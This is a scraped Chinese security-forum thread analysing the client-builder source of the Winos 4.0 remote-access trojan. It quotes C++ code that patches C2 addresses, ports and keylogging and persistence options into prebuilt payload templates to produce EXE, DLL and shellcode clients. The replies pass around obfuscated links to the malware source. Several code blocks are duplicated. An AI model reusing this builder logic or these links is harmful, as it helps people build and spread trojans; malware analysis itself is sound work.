首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[原创]银狐 winos 4.0 源码分析:客户端生成流程
发表于: 2024-11-22 10:52 21185

[原创]银狐 winos 4.0 源码分析:客户端生成流程

bwner 活跃值
2
2024-11-22 10:52
21185

最近在学习木马分析,网上关于银狐的源码分析目前还没看到,挖个坑学一学银狐(winos 4.0)的源码。

客户生成/BuildDlg.cpp 是生成客户端的窗口类(CBuildDlg)的实现代码,是由下面几个函数实现客户端的生成:

生成过程由CBuildDlg::build函数进行控制,被上面几个函数进行调用,此处为核心代码:

整体流程为:

其中获取配置信息的getsettingdata()函数尤为重要,配置信息由客户端界面进行设置,部分为默认值:

生成客户端(exe)的日志如下:

其中 上线模块.bin -> output_64.exe 流程由 CBuildDlg::changedataandwritefile()函数控制,具体流程为:

上述流程详细来说:

也就是说,.bin 文件实际上就是预先编译好的exe文件,最后进行:

生成客户端(dll)的日志为:

生成dll的核心函数为CBuildDlg::OnBnClickedBuilddll(),具体流程为:

首先会询问是否加载DLL入口点的原因是这个dll可以使用两种执行方式:

DLL生成时需要额外处理导出函数,这里额外使用了一个标记 "zidingyixiugaidaochuhanshu":

生成过程中会将这个函数名替换到DLL模板中预设的"zidingyixiugaidaochuhanshu"标记位置。在代码中导出函数名是通过界面上的 m_edit_dll 变量控制的,其默认值为"run":

银狐的设计比较灵活,对比两种dll执行方式,各有优缺点:

DllMain执行:

导出函数执行:

生成Shellcode的主要流程在OnBnClickedBuildShellcodechangeshellcodeandwritefile这两个函数中。主要流程如下:

首先提示用户Shellcode的限制:

准备Shellcode的配置信息:

读取Shellcode模板文件:

组合Shellcode数据:

写出Shellcode文件:

其中Shellcode的数据结构为:

数据排列方式:

可以看到这里使用的是执行代码.dll而不是上线模块.dll,是因为执行代码.dll和上线模块.dll的用途和结构是不同的:

上线模块.dll:

执行代码.dll:

执行代码.dll的源码ShellCode_main.cpp的实现核心为:

从执行代码.dll(shellcode)下载的payload是上线模块.dll/.bin:

最后Shellcode完整执行方式为:

powershell 目前很少用到,并且有一定限制,本文主要针对几种主要使用的客户端生成流程进行分析,如有问题欢迎指正。

void OnBnClickedBuildexe() // 生成EXE文件
void OnBnClickedBuilddll() // 生成DLL文件
void OnBnClickedBuildShellcode() // 生成Shellcode
void OnBnClickedBuildPowershell() // 生成PowerShell脚本,PowerShell生成方式只使用第一组服务器配置。
void OnBnClickedBuildexe() // 生成EXE文件
void OnBnClickedBuilddll() // 生成DLL文件
void OnBnClickedBuildShellcode() // 生成Shellcode
void OnBnClickedBuildPowershell() // 生成PowerShell脚本,PowerShell生成方式只使用第一组服务器配置。
BOOL CBuildDlg::build(int mode)
{
    UpdateData(TRUE);
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
 
}
BOOL CBuildDlg::build(int mode)
{
    UpdateData(TRUE);
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86  dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64  exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
 
}
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));
 
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;
 
 
 
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
 
 
 
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;
 
 
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
 
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
 
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
 
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
 
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);
    s.MakeReverse();
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
 
}
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));
 
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
 
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;
 
 
 
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
 
 
 
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;
 
 
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
 
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
 
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
 
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
 
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);
    s.MakeReverse();
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
 
}
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
BOOL CBuildDlg::changedataandwritefile(CString path, BOOL bchangeexport)
{
    TCHAR DatPath[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, DatPath, sizeof(DatPath));
    *_tcsrchr(DatPath, _T('\\')) = '\0';
    CString path_data;
    path_data = DatPath;
    path_data += path;
 
    WIN32_FIND_DATA FindData;
    HANDLE hFile;
    hFile = FindFirstFile(path_data, &FindData);
    if (hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件不存在")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));  return FALSE; }
    FindClose(hFile);
 
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
    hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件失败"));     m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        return FALSE;
    }
    DWORD len = GetFileSize(hFile, NULL);
    char* str = new char[len];
    ZeroMemory(str, sizeof(str));
    DWORD wr = 0;
    ReadFile(hFile, str, len, &wr, NULL);
    CloseHandle(hFile);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("修改配置信息\r\n"));
    DWORD dwOffset = -1;
    dwOffset = memfind(str, _T("xiugaishiyong"), len, 0);
 
    if (dwOffset == -1)                                          //无法修改配置信息就退出
    {
 
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到上线配置标记 \r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
    DWORD dwOffset_export = -1;
    char* exportnamebuf = NULL;
    int exportnamelen = 0;
 
    if (bchangeexport)
    {
 
        dwOffset_export = memfind(str, "zidingyixiugaidaochuhanshu", len, 0);
         exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
        exportnamebuf = new char[exportnamelen + 1];
        WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
        if ((dwOffset_export == -1))  //无法修改到处函数名就退出
        {
            log_信息("找不到导出函数");
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"));
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
            SAFE_DELETE_AR(exportnamebuf);
            SAFE_DELETE_AR(str);
            return FALSE;
        }
    }
 
 
 
    //写出配置好的文件
    CFile file;
    if (file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
    {
        if (dwOffset != -1)
            memcpy(str + dwOffset, (char*)&confi, lstrlen(confi) * 2 + 1);
 
        if (bchangeexport)
            memcpy(str + dwOffset_export, (char*)exportnamebuf, exportnamelen);
        file.Write(str, len);
        file.Close();
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("写出成功"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        SAFE_DELETE_AR(str);
        return TRUE;
    }
    else
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件无法创建,查看是否占用\r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
}
BOOL CBuildDlg::changedataandwritefile(CString path, BOOL bchangeexport)
{
    TCHAR DatPath[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, DatPath, sizeof(DatPath));
    *_tcsrchr(DatPath, _T('\\')) = '\0';
    CString path_data;
    path_data = DatPath;
    path_data += path;
 
    WIN32_FIND_DATA FindData;
    HANDLE hFile;
    hFile = FindFirstFile(path_data, &FindData);
    if (hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件不存在")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));  return FALSE; }
    FindClose(hFile);
 
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
    hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件失败"));     m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        return FALSE;
    }
    DWORD len = GetFileSize(hFile, NULL);
    char* str = new char[len];
    ZeroMemory(str, sizeof(str));
    DWORD wr = 0;
    ReadFile(hFile, str, len, &wr, NULL);
    CloseHandle(hFile);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("修改配置信息\r\n"));
    DWORD dwOffset = -1;
    dwOffset = memfind(str, _T("xiugaishiyong"), len, 0);
 
    if (dwOffset == -1)                                          //无法修改配置信息就退出
    {
 
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到上线配置标记 \r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
 
    DWORD dwOffset_export = -1;
    char* exportnamebuf = NULL;
    int exportnamelen = 0;
 
    if (bchangeexport)
    {
 
        dwOffset_export = memfind(str, "zidingyixiugaidaochuhanshu", len, 0);
         exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
        exportnamebuf = new char[exportnamelen + 1];
        WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
        if ((dwOffset_export == -1))  //无法修改到处函数名就退出
        {
            log_信息("找不到导出函数");
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"));
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
            SAFE_DELETE_AR(exportnamebuf);
            SAFE_DELETE_AR(str);
            return FALSE;
        }
    }
 
 
 
    //写出配置好的文件
    CFile file;
    if (file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
    {
        if (dwOffset != -1)
            memcpy(str + dwOffset, (char*)&confi, lstrlen(confi) * 2 + 1);
 
        if (bchangeexport)
            memcpy(str + dwOffset_export, (char*)exportnamebuf, exportnamelen);
        file.Write(str, len);
        file.Close();
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("写出成功"));   m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);  m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        SAFE_DELETE_AR(str);
        return TRUE;

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2024-11-22 10:54 被bwner编辑 ,原因:
收藏
免费 5
支持
分享
最新回复 (19)
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
大佬方便分享一份源码吗
2024-11-22 13:44
0
bwner
雪    币: 2522
活跃值: (5854)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
私信
3
Hades一KXXY 大佬方便分享一份源码吗
我看的这套 9beK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6x3L8$3N6C8K9i4y4K6i4K6u0r3f1X3q4@1i4K6u0V1N6$3W2F1L8%4x3@1i4K6u0W2x3q4)9J5k6r3N6Z5x3s2y4@1
2024-11-22 14:03
0
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
bwner 我看的这套 171K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6x3L8$3N6C8K9i4y4K6i4K6u0r3f1X3q4@1i4K6u0V1N6$3W2F1L8%4x3@1i4K6u0W2x3q4)9J5k6r3N6Z5x3s2y4@1
winos4.0 里面的源码全是空的这个项目
2024-11-22 14:07
0
bwner
雪    币: 2522
活跃值: (5854)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
私信
5
Hades一KXXY winos4.0 里面的源码全是空的这个项目
有的,插件就是源码
2024-11-22 14:27
0
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
bwner 有的,插件就是源码

我打开方式错误了么,就是模块里

2024-11-22 14:36
0
bwner
雪    币: 2522
活跃值: (5854)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
私信
7
Hades一KXXY 我打开方式错误了么,就是模块里
看起来确实删掉了,用git版本回退吧,看到他明确写了delete了哈哈哈
2024-11-22 14:37
0
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
bwner 看起来确实删掉了,用git版本回退吧,看到他明确写了delete了哈哈哈
我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗
2024-11-22 14:40
0
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗
大佬方便发一份吗,在线等着学习
2024-11-22 15:13
0
bwner
雪    币: 2522
活跃值: (5854)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
私信
10
Hades一KXXY 大佬方便发一份吗,在线等着学习
不方便
2024-11-22 15:18
0
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
bwner 不方便
那可以单发一下BuildDlg.cpp么
2024-11-22 15:19
0
2DCoXrq
雪    币: 2464
活跃值: (9105)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
12
Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前存的吗

银狐这里倒是有套源码,当心有后门
e3fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6H3j5h3&6Q4x3X3g2T1j5h3W2V1N6g2)9J5k6h3y4G2L8g2)9J5c8Y4y4Q4x3V1j5I4j5%4p5J5z5p5W2H3f1V1E0Q4y4h3k6e0d9W2u0G2c8W2M7K6M7o6S2A6b7g2A6%4

提取码:d77k


只需要 BuildDlg.cpp 的话
c2aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5i4K6u0W2N6%4x3J5z5q4)9J5k6h3y4F1i4K6u0r3k6W2)9J5c8X3k6E0M7h3V1J5P5i4t1J5j5e0y4#2

最后于 2024-11-22 16:25 被2DCoXrq编辑 ,原因:
2024-11-22 16:19
3
Hades一KXXY
雪    币: 4389
活跃值: (1544)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
13
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
谢谢大佬,你可太好了,我用虚拟机研究,加规则的,感谢
2024-11-22 16:34
0
CppLover
雪    币: 183
活跃值: (45)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
你好。只需要 BuildDlg.cpp 的话
581K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5i4K6u0W2N6%4x3J5z5q4)9J5k6h3y4F1i4K6u0r3k6W2)9J5c8X3k6E0M7h3V1J5P5i4t1J5j5e0y4#2
2024-12-4 23:02
0
CppLover
雪    币: 183
活跃值: (45)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
15
2DCoXrq Hades一KXXY 我找了一下好像没看到有对应的版本,估计第一次上传后整个库删了,我找他最早上传的库,也没有源码,你那边方便分享一份之前 ...
这个链接失效了,可以再发一次吗?
2024-12-4 23:06
0
领航装饰
雪    币: 27
活跃值: (55)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
16
学习,虽然看不懂
2024-12-13 10:21
0
mb_vdaqkotg
雪    币: 200
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
17

